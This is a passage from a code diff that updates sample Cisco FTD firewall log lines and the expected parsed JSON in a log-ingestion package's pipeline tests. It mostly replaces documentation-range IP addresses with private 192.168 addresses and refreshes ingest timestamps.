%FTD-6-302015: Built outbound UDP connection 447235 for outside:192.168.77.12/11180 (192.168.77.12/11180) to identity:10.0.13.13/80 (10.0.13.13/80) -Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613] -Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613] -Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678) -Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678) -Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447236 for outside:192.0.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs -Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs -Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs -Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside -Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside -Dec 11 2018 08:01:39 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.0.0.12/5000 by access-group "dmz" [0x123a465e, 0x8c20f21] -Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000) -Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000) -Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447237 for outside:192.0.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs +Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613] +Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613] +Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678) +Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678) +Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs +Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs +Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs +Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside +Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside +Dec 11 2018 08:01:39 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.168.0.12/5000 by access-group "dmz" [0x123a465e, 0x8c20f21] +Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000) +Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000) +Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447237 for outside:192.168.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs Aug 15 2012 23:30:09: %FTD-6-302016: Teardown UDP connection 40 for outside:10.44.4.4/500 to inside:10.44.2.2/500 duration 0:02:02 bytes 1416 -Sep 12 2014 06:50:53 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic -Sep 12 2014 06:51:01 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic -Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic -Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic -Sep 12 2014 06:51:06 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic -Sep 12 2014 06:51:17 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic +Sep 12 2014 06:50:53 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic +Sep 12 2014 06:51:01 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic +Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic +Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic +Sep 12 2014 06:51:06 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic +Sep 12 2014 06:51:17 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic Sep 12 2014 06:52:48 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic Sep 12 2014 06:53:00 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic -Sep 12 2014 06:53:01 GIFRCHN01 : %FTD-4-106023: Deny tcp src outside:192.0.2.95/24069 dst inside:10.32.112.125/25 by access-group "PERMIT_IN" [0x0, 0x0]" +Sep 12 2014 06:53:01 GIFRCHN01 : %FTD-4-106023: Deny tcp src outside:192.168.2.95/24069 dst inside:10.32.112.125/25 by access-group "PERMIT_IN" [0x0, 0x0]" Sep 12 2014 06:53:02 GIFRCHN01 : %FTD-3-313001: Denied ICMP type=3, code=3 from 10.2.3.5 on interface Outside Jan 14 2015 13:16:13: %FTD-4-313004: Denied ICMP type=0, from laddr 172.16.30.2 on interface inside to 172.16.1.10: no matching session -Jan 14 2015 13:16:14: %FTD-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.88.99.1/7890) to outside:192.88.99.129/80 (192.88.99.129/80), destination 192.88.99.129 resolved from dynamic list: bad.example.com -Jan 14 2015 13:16:14: %FTD-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.225/80), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware -Jan 14 2015 13:16:14: %FTD-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.223/8080), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware -Nov 16 2009 14:12:35: %FTD-5-304001: 10.30.30.30 Accessed URL 192.0.2.1:/app -Nov 16 2009 14:12:36: %FTD-5-304001: 10.5.111.32 Accessed URL 192.0.2.32:http://example.com -Nov 16 2009 14:12:37: %FTD-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.0.0.19 on interface inside +Jan 14 2015 13:16:14: %FTD-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.168.99.1/7890) to outside:192.168.99.129/80 (192.168.99.129/80), destination 192.168.99.129 resolved from dynamic list: bad.example.com +Jan 14 2015 13:16:14: %FTD-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.225/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware +Jan 14 2015 13:16:14: %FTD-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/8080), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware +Nov 16 2009 14:12:35: %FTD-5-304001: 10.30.30.30 Accessed URL 192.168.2.1:/app +Nov 16 2009 14:12:36: %FTD-5-304001: 10.5.111.32 Accessed URL 192.168.2.32:http://example.com +Nov 16 2009 14:12:37: %FTD-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.168.0.19 on interface inside diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json index 7949728e22e..df048d88373 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json @@ -6,8 +6,8 @@ }, "destination": { "port": 53, - "address": "192.0.0.8", - "ip": "192.0.0.8" + "address": "192.168.0.8", + "ip": "192.168.0.8" }, "source": { "port": 63016, @@ -43,13 +43,13 @@ "related": { "ip": [ "10.1.2.30", - "192.0.0.8" + "192.168.0.8" ] }, "event": { "severity": 4, - "ingested": "2021-09-07T12:22:01.768609600Z", - "original": "Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 by access-group \"acl_dmz\" [0xe3aab522, 0x0]", + "ingested": "2021-12-09T13:35:10.982940200Z", + "original": "Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -76,8 +76,8 @@ }, "destination": { "port": 53, - "address": "192.0.0.8", - "ip": "192.0.0.8" + "address": "192.168.0.8", + "ip": "192.168.0.8" }, "source": { "port": 63016, @@ -113,13 +113,13 @@ "related": { "ip": [ "10.1.2.30", - "192.0.0.8" + "192.168.0.8" ] }, "event": { "severity": 4, - "ingested": "2021-09-07T12:22:01.768617500Z", - "original": "Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3aab522, 0x0]", + "ingested": "2021-12-09T13:35:10.982948100Z", + "original": "Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -146,8 +146,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2241, @@ -183,13 +183,13 @@ "related": { "ip": [ "10.1.2.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768619600Z", - "original": "Apr 15 2014 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.982952400Z", + "original": "Apr 15 2014 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -217,8 +217,8 @@ }, "destination": { "port": 53, - "address": "192.0.2.10", - "ip": "192.0.2.10" + "address": "192.168.2.10", + "ip": "192.168.2.10" }, "source": { "port": 1039, @@ -258,7 +258,7 @@ ], "ip": [ "172.29.2.101", - "192.0.2.10" + "192.168.2.10" ] }, "host": { @@ -266,8 +266,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768631600Z", - "original": "Apr 24 2013 16:00:28 INT-FW01 : %FTD-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -\u003e outside/192.0.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0]", + "ingested": "2021-12-09T13:35:10.982957300Z", + "original": "Apr 24 2013 16:00:28 INT-FW01 : %FTD-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -\u003e outside/192.168.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -294,8 +294,8 @@ }, "destination": { "port": 53, - "address": "192.0.2.57", - "ip": "192.0.2.57" + "address": "192.168.2.57", + "ip": "192.168.2.57" }, "source": { "port": 1065, @@ -335,7 +335,7 @@ ], "ip": [ "172.29.2.3", - "192.0.2.57" + "192.168.2.57" ] }, "host": { @@ -343,8 +343,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768634600Z", - "original": "Apr 24 2013 16:00:27 INT-FW01 : %FTD-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -\u003e outside/192.0.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0]", + "ingested": "2021-12-09T13:35:10.982961300Z", + "original": "Apr 24 2013 16:00:27 INT-FW01 : %FTD-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -\u003e outside/192.168.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -371,8 +371,8 @@ }, "destination": { "port": 12834, - "address": "192.0.2.130", - "ip": "192.0.2.130" + "address": "192.168.2.130", + "ip": "192.168.2.130" }, "source": { "port": 4952, @@ -408,13 +408,13 @@ "related": { "ip": [ "10.123.3.42", - "192.0.2.130" + "192.168.2.130" ] }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768636600Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.0.2.130/12834", + "ingested": "2021-12-09T13:35:10.982966100Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.168.2.130/12834", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -446,8 +446,8 @@ }, "source": { "port": 443, - "address": "192.0.2.43", - "ip": "192.0.2.43" + "address": "192.168.2.43", + "ip": "192.168.2.43" }, "tags": [ "preserve_original_event" @@ -478,14 +478,14 @@ }, "related": { "ip": [ - "192.0.2.43", + "192.168.2.43", "10.123.3.42" ] }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768638300Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743274 for outside:192.0.2.43/443 (192.0.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834)", + "ingested": "2021-12-09T13:35:10.982970800Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743274 for outside:192.168.2.43/443 (192.168.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -501,7 +501,7 @@ "destination_interface": "outside", "mapped_source_port": 443, "mapped_destination_ip": "10.123.3.42", - "mapped_source_ip": "192.0.2.43", + "mapped_source_ip": "192.168.2.43", "connection_id": "89743274", "source_interface": "outside", "mapped_destination_port": 12834 @@ -514,8 +514,8 @@ }, "destination": { "port": 25882, - "address": "192.0.2.130", - "ip": "192.0.2.130" + "address": "192.168.2.130", + "ip": "192.168.2.130" }, "source": { "port": 52925, @@ -551,13 +551,13 @@ "related": { "ip": [ "10.123.1.35", - "192.0.2.130" + "192.168.2.130" ] }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768640Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.0.2.130/25882", + "ingested": "2021-12-09T13:35:10.982975200Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.168.2.130/25882", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -589,11 +589,11 @@ }, "source": { "nat": { - "ip": "192.0.2.43" + "ip": "192.168.2.43" }, - "address": "192.0.2.222", + "address": "192.168.2.222", "port": 53, - "ip": "192.0.2.222" + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -624,15 +624,15 @@ }, "related": { "ip": [ - "192.0.2.222", - "192.0.2.43", + "192.168.2.222", + "192.168.2.43", "10.123.1.35" ] }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768641600Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-302015: Built outbound UDP connection 89743275 for outside:192.0.2.222/53 (192.0.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882)", + "ingested": "2021-12-09T13:35:10.982979800Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-302015: Built outbound UDP connection 89743275 for outside:192.168.2.222/53 (192.168.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -648,7 +648,7 @@ "destination_interface": "outside", "mapped_source_port": 53, "mapped_destination_ip": "10.123.1.35", - "mapped_source_ip": "192.0.2.43", + "mapped_source_ip": "192.168.2.43", "connection_id": "89743275", "source_interface": "outside", "mapped_destination_port": 25882 @@ -661,8 +661,8 @@ }, "destination": { "port": 45392, - "address": "192.0.2.130", - "ip": "192.0.2.130" + "address": "192.168.2.130", + "ip": "192.168.2.130" }, "source": { "port": 4953, @@ -698,13 +698,13 @@ "related": { "ip": [ "10.123.3.42", - "192.0.2.130" + "192.168.2.130" ] }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768643100Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.0.2.130/45392", + "ingested": "2021-12-09T13:35:10.982985400Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.168.2.130/45392", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -737,8 +737,8 @@ }, "source": { "port": 80, - "address": "192.0.2.1", - "ip": "192.0.2.1" + "address": "192.168.2.1", + "ip": "192.168.2.1" }, "tags": [ "preserve_original_event" @@ -769,15 +769,15 @@ }, "related": { "ip": [ - "192.0.2.1", + "192.168.2.1", "10.123.3.42", "10.123.3.130" ] }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768644600Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743276 for outside:192.0.2.1/80 (192.0.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392)", + "ingested": "2021-12-09T13:35:10.982989800Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743276 for outside:192.168.2.1/80 (192.168.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -793,7 +793,7 @@ "destination_interface": "outside", "mapped_source_port": 80, "mapped_destination_ip": "10.123.3.130", - "mapped_source_ip": "192.0.2.1", + "mapped_source_ip": "192.168.2.1", "connection_id": "89743276", "source_interface": "outside", "mapped_destination_port": 45392 @@ -811,8 +811,8 @@ }, "source": { "port": 53, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -843,15 +843,15 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "10.123.1.35" ] }, "event": { "severity": 6, "duration": 5025000000000, - "ingested": "2021-09-07T12:22:01.768646700Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 89743275 for outside:192.0.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140", + "ingested": "2021-12-09T13:35:10.982994800Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 89743275 for outside:192.168.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140", "code": "302016", "kind": "event", "start": "2013-04-29T11:36:05.000Z", @@ -884,8 +884,8 @@ }, "source": { "port": 53, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -916,15 +916,15 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "10.123.1.35" ] }, "event": { "severity": 6, "duration": 36000000000000, - "ingested": "2021-09-07T12:22:01.768648200Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 666 for outside:192.0.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999", + "ingested": "2021-12-09T13:35:10.983000700Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 666 for outside:192.168.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999", "code": "302016", "kind": "event", "start": "2013-04-29T02:59:50.000Z", @@ -991,7 +991,7 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768649800Z", + "ingested": "2021-12-09T13:35:10.983041400Z", "original": "Jun 04 2011 21:59:52 FJSG2NRFW01 : %FTD-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr 192.168.132.46/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", @@ -1016,8 +1016,8 @@ }, "destination": { "port": 10879, - "address": "192.0.0.130", - "ip": "192.0.0.130" + "address": "192.168.0.130", + "ip": "192.168.0.130" }, "source": { "port": 4954, @@ -1053,13 +1053,13 @@ "related": { "ip": [ "192.168.3.42", - "192.0.0.130" + "192.168.0.130" ] }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768651800Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.0.0.130/10879", + "ingested": "2021-12-09T13:35:10.983045400Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.168.0.130/10879", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -1092,8 +1092,8 @@ }, "source": { "port": 80, - "address": "192.0.0.17", - "ip": "192.0.0.17" + "address": "192.168.0.17", + "ip": "192.168.0.17" }, "tags": [ "preserve_original_event" @@ -1124,15 +1124,15 @@ }, "related": { "ip": [ - "192.0.0.17", + "192.168.0.17", "192.168.3.42", "10.0.0.130" ] }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.768653300Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743277 for outside:192.0.0.17/80 (192.0.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879)", + "ingested": "2021-12-09T13:35:10.983049400Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743277 for outside:192.168.0.17/80 (192.168.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -1148,7 +1148,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "10.0.0.130", - "mapped_source_ip": "192.0.0.17", + "mapped_source_ip": "192.168.0.17", "connection_id": "89743277", "source_interface": "outside", "mapped_destination_port": 10879 @@ -1166,8 +1166,8 @@ }, "source": { "port": 12981, - "address": "192.0.0.66", - "ip": "192.0.0.66" + "address": "192.168.0.66", + "ip": "192.168.0.66" }, "tags": [ "preserve_original_event" @@ -1189,14 +1189,14 @@ }, "related": { "ip": [ - "192.0.0.66", + "192.168.0.66", "10.1.2.60" ] }, "event": { "severity": 2, - "ingested": "2021-09-07T12:22:01.768654900Z", - "original": "Apr 30 2013 09:22:33: %FTD-2-106007: Deny inbound UDP from 192.0.0.66/12981 to 10.1.2.60/53 due to DNS Query", + "ingested": "2021-12-09T13:35:10.983053600Z", + "original": "Apr 30 2013 09:22:33: %FTD-2-106007: Deny inbound UDP from 192.168.0.66/12981 to 10.1.2.60/53 due to DNS Query", "code": "106007", "kind": "event", "action": "firewall-rule", @@ -1219,8 +1219,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2006, @@ -1256,13 +1256,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768657500Z", - "original": "Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983057300Z", + "original": "Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1289,8 +1289,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49734, @@ -1326,13 +1326,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768659100Z", - "original": "Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983062Z", + "original": "Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1359,8 +1359,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49735, @@ -1396,13 +1396,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768660700Z", - "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983067500Z", + "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1429,8 +1429,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49736, @@ -1466,13 +1466,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768662300Z", - "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:35:10.983071Z", + "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -\u003e 